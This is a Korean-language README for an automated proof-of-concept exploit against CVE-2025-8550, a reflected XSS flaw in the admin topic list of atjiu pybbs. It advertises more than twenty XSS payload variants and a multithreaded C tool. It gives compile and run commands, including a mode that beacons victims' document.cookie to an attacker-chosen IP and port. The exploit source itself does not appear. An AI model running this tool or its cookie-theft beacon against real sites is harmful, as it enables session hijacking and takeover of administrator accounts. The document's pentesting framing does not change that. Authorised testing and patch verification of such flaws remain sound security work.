
# CVE-2025-8550 자동화 PoC 익스플로잇 atjiu pybbs의 반사형 XSS 취약점인 CVE-2025-8550에 대한 자동화된 개념 증명(PoC) 익스플로잇입니다. 20개 이상의 페이로드 변형, 쿠키 탈취, 멀티스레딩, 그리고 침투 테스트를 위한 사용자 지정 가능한 CLI를 제공합니다.
이 저장소는 atjiu pybbs (≤ v6.0.0)에서 발견된 반사형 교차 사이트 스크립팅(XSS) 취약점인 CVE-2025-8550에 대한 자동화된 개념 증명(PoC) 익스플로잇을 제공합니다. 이는 입력값 검증이 부족한 /admin/topic/list 엔드포인트의 username 매개변수를 대상으로 합니다.
20개 이상의 페이로드 변형: script, SVG, iframe, object, onerror 핸들러 등.
자동 URL 인코딩: libcurl의 curl_easy_escape를 통해 안전한 인젝션을 보장합니다.
쿠키 유출 (선택 사항): document.cookie를 공격자 제어 서버로 보내는 비콘 인젝션.
멀티스레딩: pthreads를 사용하여 시도를 병렬화하고 테스트 속도를 높입니다.
사용자 정의 가능한 CLI: argparse 기반으로 다음을 지정할 수 있습니다:
-u / --url)-c / --cookies)-k / --cokpay)-i / --ip, -p / --port)-v / --verbose)# Compile the exploit binary
gcc exploit.c argparse.c -o CVE-2025-8550 -lcurl -lpthread
# Run against target
./CVE-2025-8550 -u http://<TARGET> -v [-c [COOKIE_FILE]]
#COOKIE SEND :
./CVE-2025-8550 -u http://TARGET -i <YOUR_IP> -p <YOUR_PORT> -v [VERBOSE_MODE] -k [PAYLOAD_COOKIE]
http://<TARGET>을 atjiu pybbs 인스턴스로 바꾸세요.-k를 사용하여 쿠키 도용 비콘을 활성화하십시오 (-i 및 -p 필요).-c를 생략하십시오.MIT License